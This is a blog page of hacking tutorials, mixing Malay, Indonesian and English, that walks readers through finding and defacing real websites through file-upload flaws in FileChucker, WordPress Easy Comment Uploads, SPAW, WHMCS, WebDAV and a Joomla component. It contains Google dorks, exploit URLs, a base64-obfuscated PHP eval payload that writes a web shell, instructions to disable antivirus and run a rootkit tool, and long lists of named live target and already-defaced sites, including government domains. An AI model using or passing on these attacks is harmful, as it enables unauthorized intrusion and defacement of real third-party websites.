MxDotMy | Media Terkini

Showing posts with label TUTORIAL HACK. Show all posts

Home » Posts filed under TUTORIAL HACK

"Encodable" ~ another Deface and shell upload Vulnerablity

Title : "Encodable" ~ another File upload Vulnerablity

Google Dork : "intext:File Upload by Encodable"

Lets Start .. xd

open google.com and enter this dork : "intext:File Upload by Encodable"

result comes with 166,000 results but some results are fake ... its may be malwaers

so pick real things only , "Upload a file" You will this title in search results here :)

click the sites sites only which comes with upload a file title

after click the link you'll got a upload form

you'll saw some options in this form like name Description email etc ...

type anything in these boxes but add a email in email box, dont use your own

put this one billy@microsoft.com , admin@nasa.gov etc :P

now choose you file and upload it :)

after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed

after uploading file

in some sites you'll got you uploaded file link after uploading on website

and if you did not file it then try these url

/upload/files/

or /upload/userfiles/

Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx

Uploaded page : http://150.101.230.65:8008/upload/files/xd.html

Exploit WordPress uploads

Exploit WordPress “/easy-comment-uploads/upload-form.php”

—————————————————————————-

| Title : WordPress Plugin EasyComment Upload Vulnerability

| Author: Z190T

| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/

| Date : 15/06/2011

| Dork : “/easy-comment-uploads/upload-form.php”

| Category : PHP [File Upload Vulnerability]

| Tested on: [Windows XP3, Linux Ubuntu]

—————————————————————————-

*_Exploit_*

# http://[localhost]/[path]/easy-comment-uploads/upload-form.php

# http://[localhost]/easy-comment-uploads/upload-form.php

# File Extention [.txt],[.jpg],[gif],[png],[bmp]

*_Preview_*

# site/wp-content/uploads/[years]/[month]/[yourshell]

# ex: site/wp-content/uploads/2011/06/shell.php;.txt

=========================================================

Demo langsung :

http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg

http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg

Wordpress Exploit Easy Comment Upload

Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC : /wp-content/plugins/easy-comment-uploads/upload-form.php

Caranya :

1. Pergi Google masukkan dork ke dalam Search dan Go.

Dork : inurl:easy-comment-uploads/upload-form.php

2. Pilih target.

3. Ada butang choose file tu tekan dan upload file anda.

4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.

5. Dapat target untuk upload html kira bertuahlah.

Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension

Contoh yang saya buat guna file .htm / .txt & .png

http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm
http://el-bulli.net/wp-content/uploads/2011/10/Muz_c0d3r.txt
http://onigirifx.com/wp-content/uploads/2011/10/Muz_c0d3r.png

Kalo nak edit website yang saya dah upload file tu guna POC.

Caranya :

1. http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm <--tukar URL ke

2. http://robbyvillegas.com/wp-content/plugins/easy-comment-uploads/upload-form.php

3. Kemudian upload file .htm anda...

Enjoy...

Deface Website Dengan Spaw File Manager

Asslam. dan selamat pagi!! .. hari ini admin nk share satu hack... ^_^ .. sempena hari jadi Admin Hari ini.. rase smgt pulk nk wat News pos ... heheheh ok hari ini admin nk tujukan Hack

SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY

Jom Start!!

1. Masukkan salah satu Dork ini di Google search

= inurl:Spaw2/dialogs/
= Inurl:spaw2/uploads/files \
= Index of:/Spaw2/uploads/files

2.Pilih satu website dan masukan exploit dihujung URL... dan tekan enter.

Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

Contoh: www.[localhost].com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

3.Seterusnya dia akan keluar mcm ini

Note : Kotak hitam : pilih Image or Files or Create Folder

Kotak merah: upload file deface korag..

Kotak hijau : tekn upload utok upload file deface korag :)

4.Untok lihat deface korang tgok dekat Kotak Biru dan klik dia akan auto Tab dah deface korag akan keluar ^_^

Siap ^_^... harap korang semua gembira yer ^_^

Live Demo By Mr.Ubuntu CH/SH

http://www.oracle-ilnews.com/spaw2/uploads/files/Mr.UbuntuCH.html

http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/Mr.Ubuntu%20%20CH_SH.txt

http://www.sunbelt-chiangmai.com/spaw2/uploads/files/Mr.Ubuntu%20CH_SH.html

http://www-old.dtam.moph.go.th/admin/spaw2/uploads/files/Mr.UbuntuCH_SH.html

http://www.medinacreativehousing.com/template/spaw2/uploads/files/Mr.UbuntuCH_SH.html

http://www.orlandobarreto.adv.br/spaw2/uploads/images/Mr.UbuntuCH_SH%20_1.jpg

http://ilioslighting.com/admin/spaw2/uploads/files/Mr.UbuntuCH_SH%20.jpg

http://www.improvinghealthcolorado.org/files/images/Mr.UbuntuCH_SH%20.jpg

http://www.uniaks.ru/spaw2/uploads/files/Mr.UbuntuCH_SH.html

Credit To :Mr.Ubuntu CH/SH & Noentry PHC ^_^

Hack WHM with Submit Ticket Exploit

apa kabar sobat  jumpa lagi dengan sinchankeke ganteng mendunia sudah lama kita tidak berjumpa di karenakan saya sibuk nonton ovj di youtube..kakakakakakakak
Pada kesempatan ini siinchankeke akan memberikan Tutorial cara Hack WHMCS dengan Menggunakan Metode Submitticket

Sebelum kita masuk ke pembahasan Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket, marilah kita persiapkan dahulu bahan-bahan untuk Hack WHMCS dengan Menggunakan Metode Submitticket

Bahan-bahannya cukuplah simple, hanya membutuhkan sebuah script untuk mengupload shell anda Website WHMCS yang akan di hack dengan menggunakan metode Submitticket

Berikut ini Scriptnya :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OE{php}eval(base64_decode('wyWnZjbTAgSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSSBQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSSBWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JIFBHSnlQaWM3SUgwTkNuME5DajggIik7ICR2ID0gYmFzZTY0X2RlY29kZSgiSkhZZ1BTQWtTRlJVVUY5RFQwOUxTVVZmVmtGU1Uxc2lkbWx6YVhSeklsMDdEUW9nYVdZb0lDUjJJRDA5SUNJaUtRMEtJSHNrZGlBOUlEQTdEUW9nSkhacGMybDBiM0lnUFNBa1gxTkZVbFpGVWxzaVVrVk5UMVJGWDBGRVJGSWlYVHNOQ2lBa2QyVmlJRDBnSkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE93MEtJQ1JwYm1vZ1BTQWtYMU5GVWxaRlVsc2lVa1ZSVlVWVFZGOVZVa2tpWFRzTkNpQWtkR0Z5WjJWMElEMGdjbUYzZFhKc1pHVmpiMlJsS0NSM1pXSXVKR2x1YWlrN0RRb2dKR0p2WkhrZ1BTQWlVMmhsYkd3Z1YyaHRZM01nUkdrZ09pQWtkR0Z5WjJWMElHbHdJQ1IyYVhOcGRHOXlJanNnUUcxaGFXd29JbmRoYkdGb01UVTVRR2R0WVdsc0xtTnZiU0lzSWlBa2RHRnlaMlYwSWl3Z0lpUmliMlI1SWlrN0RRb2dmU0JsYkhObElIc05DaUFrZGpzTkNpQjlJSE5sZEdOdmIydHBaU2dpZG1semFYUnpJaXdrZGlrNyIpOyAkZm8gPSBmb3BlbigidGVtcGxhdGVzL3gucGhwIiwidyIpOyBmd3JpdGUoJGZvLCRjb2RlLCR2KTs=')) ;{/php})
Setelah itu mari kita ikuti langkah-langkah Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket, langkahnya sebagai berikut :

Pertama-tama kita coba cari website WHMCS yang dapat di Hack WHMCS dengan Menggunakan Metode Submitticket dengan dork dibawah ini :

 1. inurl:whmcs/cart.php?a=

2. inurl:billing/cart.php?a=

intext:Powered by WHMCompleteSolution inurl:submitticket.php

intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php

intext:Powered by WHMCompleteSolution inurl:client/submitticket.php

intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php

intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php

intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php

intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php

intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php

intext:Powered by WHMCompleteSolution inurl:member/submitticket.php

intext:Powered by WHMCompleteSolution inurl:members/submitticket.php

intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php

intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php

intext:Powered by WHMCompleteSolution inurl:support/submitticket.php

intext:Powered by WHMCompleteSolution inurl:help/submitticket.php

intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php

intext:Powered by WHMCompleteSolution inurl:store/submitticket.php

intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php

intext:Powered by WHMCompleteSolution inurl:log/submitticket.php

intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php

intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php

intext:Powered by WHMCompleteSolution inurl:order/submitticket.php

intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php

intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php

intext:Powered by WHMCompleteSolution inurl:office/submitticket.php

intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com

intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org

intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net

intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info

intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"

intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"*Dork diatas dapat anda kembangkan lagi sesuai keinginan anda 

Setelah anda mendapatkan Website WHMCS yang dapat di Hack dengan Menggunakan Metode Submitticket, anda dapat mengikuti step-stepnya di bawah ini

1. Silahkan anda mencari website WHMCS dengan menggunakan DORK Google diatas
     misalkan saja saya mendapatkan website seperti ini

2.Mari kita coba dengan memasukkan Script yang telah saya berikan untuk Hack WHMCS dengan Menggunakan Metode Submitticket diatas tadi pada kolom "Nama","Subject", dan "Isi"

3.Klik Submit dan Coba kita cek hasilnya di http://www.[TargetWhmcsMu].com/[Path]/templates/x.php

      *Jika berhasil maka hasilnya akan seperti gambar diatas

4.Setelah Shell terupload maka langkah terakhir adalah mengupload backdoor anda
5.Sekian Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket

Deface With Webdav

Buat file deface yang perlu di upload nanti :

langkah2 :

Contoh Deface :http://graniteliquidators.com/ch.html

1. bukak : http://graniteliquidators.com/ch.html
2. pastu tekan ctrl+u , nanti keluar tab baru ,
3. Copy semua code tersebut ,
4. Bukak notepad , and paste code tadi , korang nak tukar Cyber Hacker CH kepada name korang pon buleh ,
5. dah siap , Pastu Save as belakangnye mesti ade .html contoh : cyberhacker.html
dan save as type nye : All File
6. tinggal nak upload je XP

Assalamualaikum…..entry kali ni aku nk ajar korang cara deface menggunakan WebDav oleh Hmei7.Untuk maklumat korang, Deface menggunakan WebDev ini korang dapat menanam shell.Baiklah…jom mula…

Download Files :

Korang perlu download file2nya terlebih dahulu :

Download : Rootkit

Password : cbf

Download : Shell

note : anda haru tutup antivirus anda.Kalau tidak antivirus akan detect rootkit tu sebagai virus.

Cara-cara Menggunakannya :

1. Buka tool rootkit. Akan keluar macam gambar dibawah:

2.Klik WebDav lalu klik Asp shell maker seperti gambar diatas.Lepas tu akan keluar mcam gambar dibawah:

3.Click setting…akan keluar mcm gambar dibawah:

4. Lepas keluar macam tu.. korang semua rename Hmei7 tu kepada nama ape juga nama yg korang suka. Ingat, tukar Hmei7 tu aje… yg .asp;.txt jangan ubah langsung.

5. Pastu… korang kena Load shell from file. Seperti gambar dibawah:

6. Cari shell anda tadi.pastikan anda telah extract terlebih dahulu.

Shell anda mesti hujung nama dia macam ni ---> .asp;.jpg

Then tekan open.

7. Selepas itu, Click add site.seperti gambar bawah:

8.Letak url yang u all nak target… Pastu Klik Serang!!..

Bila dah serang dia akan keluar macam gambar kat bawah…
Akan keluar tulis : Checking : http://www.apa2.com.Setelah selesai,akan keluar seperti gambar dibawah :

Sekarang copy link shell yg diberi!dan paste di dalam address bar di browser anda dan tekan enter!

note : jika berjaya,akan tertera "shell created!".Jika tidak, akan tertera "web not vuln dav".

Cara-cara Upload File Deface :

1. Setelah anda paste dan tekan enter, akan keluar paparan shell tersebut.Cari perkataan UPLOAD dan click.choose file deface anda dan click upload.Contoh file anda : apa2.html

2. Last skali enjoy deface anda!

Cara nk tngok deface anda :

www.apa2.com/apa2.html <--- file deface anda.

SIAP!!!

Cara-cara untuk replace paparan utama :

anda jugak boleh replace paparan utama website tu.

cara2nya :

1.scroll turun bawah dan cari file index.asp,

2.rename file itu kepada nama lain.cth : indexori.asp

3.rename file anda kepada index.asp.

4.Sekarang buka website tu dan enjoy deface anda.

contoh : www.apa2.com

5.Jika tidak berjaya,bermakna index.asp bukanlah file yg menyimpan paparan utama website itu.sebaliknya mungkin :

index.html/index.htm/default.html/default.htm/default.asp/

Done!!!

some vuln site :
tunjukkan kepakaran korang ,

http://admats.concerts.com/
http://my.smser.eu/
http://www.lawrenceting.com/
http://dike.dpt.go.th/
http://www.elcsfj.gov.cn/
http://documents.co.st-lucie.fl.us/
http://www.ybsds.gov.cn/
http://rsj.xxz.gov.cn/
http://www.xzll.gov.cn/
http://www.xmfg.gov.cn/
http://zzx.wlcbsgs.gov.cn/
http://www.librogondwana.com.ar/
http://www.ingacarrasco.com.ar/
http://www.salsadella.com.ar/
http://www.bgmgroup.cn/
http://ssc.rrp.kr/
http://www.bonweshop.cn/
http://www.entreculturas.pt/
http://www.51lvyo.cn/
http://www.tishineng.cn/
http://lib.zcu.edu.cn/
http://www.r-fashion.com/
http://www.shbhgy.com/
http://xcb.nenu.edu.cn/
http://www.xiajiashan.com/
http://www.aiboshop.com/
http://www.vernicefrescateatro.it/
http://www.scuolamediaserino.it/
http://www.maxvision.it/
http://www.associazionebildung.it/
http://muzquizcoahuila.com/
http://furama-villas.com/
http://jozbdn.com/
http://www.hdwebtv.it/
http://www.denuncio.cl/
http://www.turismoyarte.com/
http://www.innovatech-chile.cl/
http://www.vintagefaucet.net/
http://www.maxtek-go-go.com/
http://www.blusign.it/
http://www.indal2000.it/
http://ced.kmutnb.ac.th/
http://www.seatinterni.it/
http://www.fmfogazzifratelli.it/

http://sverigesridlager.org/
http://svenskahastsportguiden.se/
http://singelguiden.se/
http://ridsportruntsverige.se/
http://modeguide.se/
http://ridleder.se/
http://kattguiden.com/
http://kattannons.se/
http://jackrusselterrier.se/
http://hundannons.se/
http://horseandcountry.eu/
http://hastsemester.se/
http://hastochryttare.se/
http://ridsemester.com/
http://www.telecomyork.com/
http://www.webcampustecnonexo.com/
http://www.zblx.org/
http://www.candledevelopment.com/
http://www.kozi.com.tw/
http://www.cart.com.hk/
http://vendors.csgroupny.com/
http://www.4lunch.com.au/
http://www.druckpunkt.at/
http://www.tsjx.org.cn/
http://counselorlogin.com/
http://www.icandyvisuals.com/
http://dev1.ipsd.org/
http://57157111.com/
http://www.jn14z.jinedu.cn/
http://www.lsysx.jinedu.cn/
http://www.sdcydh.com/
http://www.sddaping.com/
http://www.fengyi668.com/
http://www.ssfjy.com/
http://www.dianfuxj.com/
http://zkhb.homesoft.com.cn/
http://lidu.homesoft.com.cn/
http://www.hhswbg.com/
http://www.xajpg.cn/
http://www.f580.cn/
http://www.cooptionscorp.com/
http://pla.hbu.cn/
http://5151lvyou.com/
http://www.tent-pro.tw/
http://www.mazda-gh.tw/
http://www.wiltrom.com.tw/
http://www.dialect.tw/
http://www.koul.com.tw/
http://www.digguitar.com/
http://hx0579.com/
http://teyoumei.com/
http://5152255.com/
http://km.gmtx.com/
http://tyc.ykjt.cn/
http://caiwu.hkjulong.com/

Google Dork for WebDav :

inurl:.org/*.asp

inurl:.us/*.asp

inurl:.gov.com/*.asp

inurl:.gov.il/*.asp

inurl:.co.il/*.asp

inurl:.ah.cn/*.asp

inurl:.bj.cn/*.asp

inurl:.cq.cn/*.asp

inurl:.fj.cn/*.asp

inurl:.gd.cn/*.asp

inurl:.gs.cn/*.asp

inurl:.gz.cn/*.asp

inurl:.gx.cn/*.asp

inurl:.ha.cn/*.asp

inurl:.hb.cn/*.asp

inurl:.he.cn/*.asp

inurl:.hi.cn/*.asp

inurl:.hl.cn/*.asp

inurl:.hn.cn/*.asp

inurl:.jl.cn/*.asp

inurl:.js.cn/*.asp

inurl:.jx.cn/*.asp

inurl:.ln.cn/*.asp

inurl:.nm.cn/*.asp

inurl:.nx.cn/*.asp

inurl:.qh.cn/*.asp

inurl:.sc.cn/*.asp

inurl:.sd.cn/*.asp

inurl:.sh.cn/*.asp

inurl:.sn.cn/*.asp

inurl:.sx.cn/*.asp

inurl:.tj.cn/*.asp

inurl:.tw.cn/*.asp

inurl:.xj.cn/*.asp

inurl:.xz.cn/*.asp

inurl:.yn.cn/*.asp

inurl:.zj.cn/*.asp

inurl:.ac.cn/*.asp

inurl:.com.cn/*.asp

inurl:.edu.cn/*.asp

inurl:.gov.cn/*.asp

inurl:.net.cn/*.asp

inurl:.org.cn/*.asp

CREDIT : REAPERZHACKING ( Afif )

JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY

Assalamualaikum hari ini aku nak share exploit joomla lagi.Exploit ini korang bole upload shell.Ok jom mula.

1. Google dork :
inurl:"index.php?option=com_smartformer"

2. Pilih salah satu target dah akan keluar contoh mcm dalam gambar di bawah :

Isi maklumat macam dalam gambar.
Lepas tu SUBMIT.

Akan keluar lebih kurang macam gambar di bawah :

Ok kalau keluar mcm ni mksudnya shell korang dah masuk.Tapi kalau tak keluar macam ni contoh nya dia tulis "File rejected","file contain virus", dll maksudnya korang tak boleh upload shell.

3. Untuk tengok hasil :
http://target.com/components/com_smartformer/files/SHELL.php

target.com = ganti dengan url website yg korang dapat SHELL.php tu ganti dengan nama shell korang.

note : ada website yang bole upload tapi bila buka shell tulis not found.tu maksudnya website tu simpan shell tu di directory lain.korang kena cari explore seniri.

SIAP!

Live Demo :
http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3

Result :
http://www.northendthrift.com/components/com_smartformer/files/hello.html

cc:Reaperz